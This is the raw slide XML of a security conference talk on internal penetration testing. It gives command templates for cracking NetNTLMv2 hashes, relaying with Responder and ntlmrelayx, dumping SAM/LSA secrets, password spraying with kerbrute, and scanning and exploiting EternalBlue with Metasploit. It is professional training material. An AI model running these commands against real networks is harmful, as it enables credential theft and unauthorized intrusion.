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2"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId5"/>
    <p:sldId id="290" r:id="rId6"/>
    <p:sldId id="311" r:id="rId7"/>
    <p:sldId id="312" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="260" r:id="rId10"/>
    <p:sldId id="270" r:id="rId11"/>
    <p:sldId id="298" r:id="rId12"/>
    <p:sldId id="339" r:id="rId13"/>
    <p:sldId id="299" r:id="rId14"/>
    <p:sldId id="313" r:id="rId15"/>
    <p:sldId id="301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31" r:id="rId31"/>
    <p:sldId id="332" r:id="rId32"/>
    <p:sldId id="329" r:id="rId33"/>
    <p:sldId id="330" r:id="rId34"/>
    <p:sldId id="328" r:id="rId35"/>
    <p:sldId id="333" r:id="rId36"/>
    <p:sldId id="334" r:id="rId37"/>
    <p:sldId id="335" r:id="rId38"/>
    <p:sldId id="336" r:id="rId39"/>
    <p:sldId id="337" r:id="rId40"/>
    <p:sldId id="33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28"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="DCF601"/>
    <a:srgbClr val="DDF502"/>
    <a:srgbClr val="DEF600"/>
    <a:srgbClr val="DCF500"/>
    <a:srgbClr val="C4C4C4"/>
    <a:srgbClr val="C099EF"/>
    <a:srgbClr val="FEE440"/>
    <a:srgbClr val="FDB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5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2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4B67FF-ABA6-458B-9265-99AB307457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A402D-E1FC-4A6B-A65C-0C6D8D0CD6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C6BC7-AE97-4676-B212-48D793792204}" type="datetimeFigureOut">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>02/06/25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DCB71-B2C8-4EDD-81AE-8FD5EE5F5E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718B1-93BD-4881-8442-4FB2C90267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A06DF-7A00-4715-B16D-1E67E40B459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8783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71685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8898" y="1538781"/>
            <a:ext cx="4741863" cy="207704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38898" y="3996918"/>
            <a:ext cx="4741863" cy="207704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411010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9673EDB-9BA7-B542-826C-629C2B3637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6451" y="2410053"/>
            <a:ext cx="2597150" cy="216852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0202340-C67F-7849-968B-5D88407A2E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851" y="2410053"/>
            <a:ext cx="2597150" cy="216852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F48A6B-6063-9B42-B6CC-9F7A0865EF6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93651" y="2410053"/>
            <a:ext cx="2597150" cy="216852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0A7D044-5B5E-2E47-BFA0-A383590AA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0051" y="2410053"/>
            <a:ext cx="2597150" cy="216852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537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3113" y="3905793"/>
            <a:ext cx="6224587" cy="254739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58838" y="1244600"/>
            <a:ext cx="3558449" cy="520858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01939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732B7D5-D5DF-EA4B-88A2-3E2B40C5B7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34050" y="2272938"/>
            <a:ext cx="5691109" cy="2813412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4036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5C72CF5-D00B-3843-8F81-D986FCD7DB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2220913"/>
            <a:ext cx="4597400" cy="423227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1348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DF6FC91-762C-4648-A9B7-B774E31DE6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983" y="3053443"/>
            <a:ext cx="2260600" cy="380455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F5F497E-2CB0-FA4D-AA77-56D533A6E6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4400" y="3053443"/>
            <a:ext cx="2260600" cy="380455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856981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7787B65-2BF4-4C4C-B44D-4C6757062C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7797" y="2409893"/>
            <a:ext cx="2044672" cy="3402063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0B71497-44E2-1047-9710-3315E5A697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46677" y="2409893"/>
            <a:ext cx="2044672" cy="3402063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851CDCE-E640-D94F-BB5F-59F6F435D85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15557" y="2409893"/>
            <a:ext cx="2044672" cy="3402063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8BFEAE6-D76F-B04A-98F5-373864D9E2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84437" y="2409893"/>
            <a:ext cx="2044672" cy="3402063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32711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8762B47-8EDA-0A46-8243-A9FDAF2029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37413" y="0"/>
            <a:ext cx="4022724" cy="645318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892037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D5B8FE-8CAA-364D-ADB4-5912CD1F9E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9786" y="153782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E797E8-A2E8-3747-96B8-34291A66BD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4117" y="153782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54BE741-8A38-D44E-9995-511E4343267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449" y="153782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4824C40-7E85-5D45-981F-6ED9830A368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1146" y="492197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B1A7DA4-D62B-F245-8720-DD126F409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34117" y="492197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38639CE7-4FFB-9245-B0AE-CA769495FC6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18449" y="4921979"/>
            <a:ext cx="3399238" cy="1346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164394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3511C84-0CE3-6B48-97AF-D155AD33E6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29890" y="0"/>
            <a:ext cx="3685309" cy="645318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02766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4672" y="1786709"/>
            <a:ext cx="4967328" cy="427155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1288322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78686BE-A769-1747-A59C-327208269B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33" y="1366670"/>
            <a:ext cx="4779962" cy="4702175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834735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9EA86144-D65F-474F-91E5-14DECCF19B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33240" y="1355833"/>
            <a:ext cx="6358759" cy="4693781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768725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C172F80-FE23-964B-85D7-38BF811C89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94591" y="0"/>
            <a:ext cx="4091809" cy="6857999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693610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ECF1136-2828-5649-B724-D3BFD95227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5802" y="1831428"/>
            <a:ext cx="5178424" cy="2438399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87646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2D79D5E-3B65-4D48-B1CA-97706737DF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1322858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More Image Placeholder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41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More Image Placeholder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53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More Image Placeholder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2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0501" y="3443954"/>
            <a:ext cx="3552186" cy="259924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85425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49403" y="2017486"/>
            <a:ext cx="3532661" cy="484051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287282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489166"/>
            <a:ext cx="7810500" cy="387966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412794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2251" y="2171934"/>
            <a:ext cx="3357563" cy="3022132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2187" y="1325154"/>
            <a:ext cx="3357563" cy="4715692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41947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78183" y="1020307"/>
            <a:ext cx="3217817" cy="4817386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154528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74162" y="3530600"/>
            <a:ext cx="3017838" cy="2413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74162" y="914400"/>
            <a:ext cx="3017838" cy="2413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914400"/>
            <a:ext cx="3017838" cy="50292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118657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IQU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7A87B0FC-1407-410B-92F8-483738C0DF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01914" y="809897"/>
            <a:ext cx="4076700" cy="523820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ID" dirty="0"/>
              <a:t>Click The Picture Icon or Drag Your Purpose Photo Here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="332192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4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  <p:sldLayoutId id="2147483663" r:id="rId13"/>
    <p:sldLayoutId id="2147483661" r:id="rId14"/>
    <p:sldLayoutId id="2147483662" r:id="rId15"/>
    <p:sldLayoutId id="2147483664" r:id="rId16"/>
    <p:sldLayoutId id="2147483665" r:id="rId17"/>
    <p:sldLayoutId id="2147483667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5" r:id="rId24"/>
    <p:sldLayoutId id="2147483672" r:id="rId25"/>
    <p:sldLayoutId id="2147483670" r:id="rId26"/>
    <p:sldLayoutId id="214748367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sphere&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2FCAB3A-7D4D-FE13-52D3-DF525D1D8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0" y="322120"/>
            <a:ext cx="1219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4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THE LAZY PENTESTER’S GUIDE TO COASTING THROUGH INTERNALS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-ID" sz="44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  <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-ID" sz="44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  <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-ID" sz="4400" spc="1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  <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-ID" sz="2800" b="1" spc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Field Proven methods of Obtaining Creds, Gaining Footholds, and Generally Wrecking Up The Place Without Much Effort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707B01-2B70-AB6C-9056-406F20A0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207749" y="5519209"/>
            <a:ext cx="4729626" cy="76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D0FEE-E8BF-0C85-215F-213E26F2EF25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="253965" y="5558885"/>
            <a:ext cx="5928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400" spc="10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RVASEC 14</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="44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66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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500812" y="1139032"/>
            <a:ext cx="5691188" cy="407348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1966755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OFFLINE CRACKING OF NETNTLMV2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40578" y="2612400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MODERATELY FAST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47107" y="3258045"/>
            <a:ext cx="5186840" cy="602836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MODERATELY LOW COMPUTATION REQUIREMENTS</a:t>
            </a:r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49" y="4121806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ECONOMY OF SCALE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46D71-B39E-62AE-46E0-B516154D26A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7927588" y="277127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CRACKING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E7C4B-F50A-7AF2-0F24-64EE6EBC5F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523274" y="5349636"/>
            <a:ext cx="9145452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hashcat -a 0 -O -m 5600 -o &lt;OUTPUT FILE&gt; &lt;INPUT FILE&gt; &lt;WORDLISTS&gt;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23B7F6-9B98-9710-64B5-DF5117339E64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-12427"/>
            <a:ext cx="5953904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73BB3D-4597-957B-CBAF-1F3EE2CDDC20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243970" y="241040"/>
            <a:ext cx="55002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RESPONDER/MITM6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88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887"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500812" y="2786616"/>
            <a:ext cx="5691188" cy="105071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2784152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REQUIREMENTS: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34049" y="3302410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SMB SIGNING DISABLED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34049" y="3816085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SAME NETWORK SEGMENT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49" y="4329760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ADMINISTRATIVE PRIVILEGES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46D71-B39E-62AE-46E0-B516154D26A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7956442" y="277127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RELAYING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EE853-824D-E02F-FB52-5A4E1F7C2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7394" y="3880260"/>
            <a:ext cx="4158024" cy="26812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5B7054-C7D5-C0E1-F7C4-361729F756F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734049" y="5003452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RESULTS IN SESSIONS ON HOSTS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ECC97-82E1-9335-AB65-3299999C86EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734049" y="5517127"/>
            <a:ext cx="5186840" cy="545467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RUN COMMANDS WITH PROXYCHAINS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83211-0FEF-035C-0CDA-3962BAB80D65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734049" y="6191549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DUMP SAM AND LSA SECRETS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E7C4B-F50A-7AF2-0F24-64EE6EBC5F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941437" y="1167860"/>
            <a:ext cx="10309126" cy="1531985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&lt;SCOPE FILE&gt; --gen-relay-list &lt;TARGET LIST&gt;</a:t>
            </a:r>
          </a:p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-Turn off SMB and HTTP servers in </a:t>
            </a:r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Responder.conf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-Add “socks4 127.0.0.1 1080” to /</a:t>
            </a:r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/proxychains4.conf</a:t>
            </a:r>
          </a:p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Responder.py -I &lt;INTERFACE&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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ntlmrelayx.py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tf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&lt;TARGET LIST&gt; -smb2support -socks -of &lt;OUTPUT FILE&gt;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2F8C7D-19F1-8B84-BB5C-D36F7AC4D002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5953904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BC355-BBB1-C9A2-B6F7-B3102E1815A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="243970" y="253467"/>
            <a:ext cx="55002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RESPONDER/MITM6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23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b="3976"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="2466623"/>
            <a:ext cx="4922727" cy="3252346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F99427-D2A8-630C-5DF0-54668A65AD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6230723" y="1945350"/>
            <a:ext cx="5212956" cy="2967299"/>
            <a:chOff x="734049" y="1966755"/>
            <a:chExt cx="5212956" cy="29672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ADA95-ED2F-C746-DD9D-895A8FFEA7D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="734049" y="1966755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PASSWORD SPRAYING STEPS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0A0D6-0110-6F83-7865-BD2C8C6BC795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="740578" y="2612400"/>
              <a:ext cx="5186840" cy="3847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1: IDENTIFY USERNAME FORMAT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EE6F4-9FF2-6BB2-40E0-B6383D758297}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747107" y="3258045"/>
              <a:ext cx="5186840" cy="3847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2: IDENTIFY DOMAIN INFO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3BE049-03FF-FBF5-2E6F-9F14DEC1B1A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="753636" y="3903690"/>
              <a:ext cx="5186840" cy="3847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3: ENUMERATE USERS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23B344-A808-E601-04B2-61C051D7DFF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="760165" y="4549334"/>
              <a:ext cx="5186840" cy="3847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4: PASSWORD SPRAY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DCF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PASSWORD SPRAYING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949C383-F29B-5449-00FC-23B1976C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031"/>
            <a:ext cx="4922728" cy="119011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9D66AA-D9A9-5E9C-0E3D-BD2641F5F1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5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 b="4556"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500812" y="1276817"/>
            <a:ext cx="5691188" cy="313367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1966755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MULTIPLE WAYS TO IDENTIFY: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40578" y="2612400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HUNTER.IO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47107" y="3258045"/>
            <a:ext cx="5186840" cy="3693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WHOIS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49" y="3887987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BREACH DATA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SPRAYING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46D71-B39E-62AE-46E0-B516154D26A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444536" y="24715"/>
            <a:ext cx="6747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IDENTIFY USERNAME FORMAT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7B90E-F339-763F-630D-33BB1AB901AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734049" y="4533317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EMAIL CORRESPONDENCE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49" y="5153232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SOCIAL ENGINEERING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503095-E6E9-5374-12F9-C4553A5EC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005" y="3667866"/>
            <a:ext cx="4123995" cy="2188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912C11-065B-79AA-C587-79F732E92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283" y="4410493"/>
            <a:ext cx="1600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1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r="810"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6500812" y="1553227"/>
            <a:ext cx="5691188" cy="400982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1966755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SEARCH FOR NULL SESSIONS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40578" y="2529349"/>
            <a:ext cx="5186840" cy="628612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PASSWORD POLICY</a:t>
            </a:r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 </a:t>
            </a:r>
          </a:p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&lt;DC&gt; -u ’’ -p ’’ --pass-pol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40578" y="3333000"/>
            <a:ext cx="5186840" cy="628612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USERLIST</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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&lt;DC&gt; -u ’’ -p ’’ --users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40578" y="4297808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NETEXEC (NXC) port 445 scan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SPRAYING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46D71-B39E-62AE-46E0-B516154D26A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444536" y="24715"/>
            <a:ext cx="6747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IDENTIFY DOMAIN INFORMATION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7B90E-F339-763F-630D-33BB1AB901AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740578" y="4943138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RESOLV.CONF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40578" y="5563053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DIG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2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" b="747"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8029183" y="1139031"/>
            <a:ext cx="4162815" cy="471706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8" y="1966755"/>
            <a:ext cx="5729381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NULL SESSION USERS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49" y="2602198"/>
            <a:ext cx="5729380" cy="5477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STATISTICALLY LIKELY USERNAMES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SPRAYING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46D71-B39E-62AE-46E0-B516154D26A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5444536" y="246221"/>
            <a:ext cx="6747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Enumerate Users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7B90E-F339-763F-630D-33BB1AB901AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734048" y="3301085"/>
            <a:ext cx="5729379" cy="547753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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="100" dirty="0" err="1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github.com</a:t>
            </a:r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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="100" dirty="0" err="1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insidetrust</a:t>
            </a:r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/statistically-likely-usernames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48" y="3999972"/>
            <a:ext cx="5729378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DERIVED FROM CENSUS DATA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8A4A1-3950-B72A-0BC6-BB5716EB8DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734048" y="4535826"/>
            <a:ext cx="5729377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MULTIPLE FORMATS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AF332-DCDE-3613-689A-7F4067889010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734048" y="5188031"/>
            <a:ext cx="5729381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KERBRUTE USERENUM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934CEC-4055-2FA8-0F91-AFE26525A48A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734048" y="5723885"/>
            <a:ext cx="5729377" cy="53585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kerbrute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userenum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&lt;USERLIST&gt; -d &lt;DOMAIN&gt; -o &lt;OUTPUT&gt;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/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6914367" y="3713865"/>
            <a:ext cx="5277631" cy="170997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40" y="2224893"/>
            <a:ext cx="5729380" cy="5477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TRY BAD PASSWORDS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SPRAYING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7B90E-F339-763F-630D-33BB1AB901AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734044" y="2937656"/>
            <a:ext cx="5729379" cy="36611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Spring25!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40" y="3480942"/>
            <a:ext cx="5729378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Password1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8A4A1-3950-B72A-0BC6-BB5716EB8DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734040" y="4042833"/>
            <a:ext cx="5729377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Welcome1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AF332-DCDE-3613-689A-7F4067889010}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734040" y="5553299"/>
            <a:ext cx="5729381" cy="8600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LIMIT ATTEMPTS ACCORDING TO KNOWN PASSWORD POLICY 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934CEC-4055-2FA8-0F91-AFE26525A48A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734040" y="1524029"/>
            <a:ext cx="5729377" cy="53585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kerbrute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passwordspray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&lt;USERLIST&gt; &lt;PASSWORD&gt; -v -d &lt;DOMAIN&gt; -o &lt;OUTPUT&gt;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F87B6-A129-F4D3-49B8-D6EF3A116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367" y="2603335"/>
            <a:ext cx="5281023" cy="913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88F849-623B-7402-DDB5-661E67C83CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734040" y="4605617"/>
            <a:ext cx="5729377" cy="6766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LOCAL SPORTS TEAMS, BUSINESS NAME, ETC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3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"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1609118"/>
            <a:ext cx="4922728" cy="474246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F99427-D2A8-630C-5DF0-54668A65AD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5398718" y="1609117"/>
            <a:ext cx="6451592" cy="4629727"/>
            <a:chOff x="734049" y="1630522"/>
            <a:chExt cx="5186840" cy="46297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ADA95-ED2F-C746-DD9D-895A8FFEA7D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="734049" y="1630522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OLD AND CRITICAL BUT COMMON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0A0D6-0110-6F83-7865-BD2C8C6BC795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="734049" y="2252741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TO IDENTIFY HOSTS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EE6F4-9FF2-6BB2-40E0-B6383D758297}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="734049" y="2828225"/>
              <a:ext cx="5173782" cy="62217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GENERATE LIST OF PORT 445 hosts:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" spc="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nxc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" spc="100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" spc="100" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>smb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" spc="100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> &lt;SCOPE&gt; | tee &lt;OUTPUT FILE&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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3BE049-03FF-FBF5-2E6F-9F14DEC1B1A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="753636" y="3601819"/>
              <a:ext cx="5167253" cy="62217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GENERATE LIST OF IPS:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0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cat &lt;OUTPUT FILE&gt; | cut -d ‘ ‘ -f 10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23B344-A808-E601-04B2-61C051D7DFF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="753636" y="4375411"/>
              <a:ext cx="5167253" cy="188483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METASPLOIT ONE LINER:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1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msfconsole</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0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-q -n -x "use auxiliary/scanner/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1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smb</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0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/smb_ms17_010; set </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1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ConnectTimeout</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0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1; set DCERPC::</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1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ReadTimeout</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFC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1; set threads 24; set RHOSTS file:&lt;PATH TO IP LIST&gt; ; run; exit;" -o &lt;OUTPUT FILE&gt;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MS17-010 - ETERNALBLUE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772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" b="835"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6914369" y="1986049"/>
            <a:ext cx="5277631" cy="373275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37" y="1793305"/>
            <a:ext cx="5729380" cy="5477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SEARCH FOR VULNERABLE HOSTS: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MS17-010 - ETERNALBLUE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7B90E-F339-763F-630D-33BB1AB901AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734038" y="2490077"/>
            <a:ext cx="5729373" cy="323137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grep ‘VULN’&lt;SCAN OUTPUT&gt;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37" y="3026419"/>
            <a:ext cx="5729378" cy="488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USE METASPLOIT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8A4A1-3950-B72A-0BC6-BB5716EB8DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734037" y="3660067"/>
            <a:ext cx="5729377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SEVERAL MODULES - TRY ALL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8F849-623B-7402-DDB5-661E67C83CC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734036" y="4199813"/>
            <a:ext cx="5729377" cy="6766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METERPRETER SESSIONS OR COMMAND EXECUTION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36E14-2588-4A56-FB2B-8ED528CF9B9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
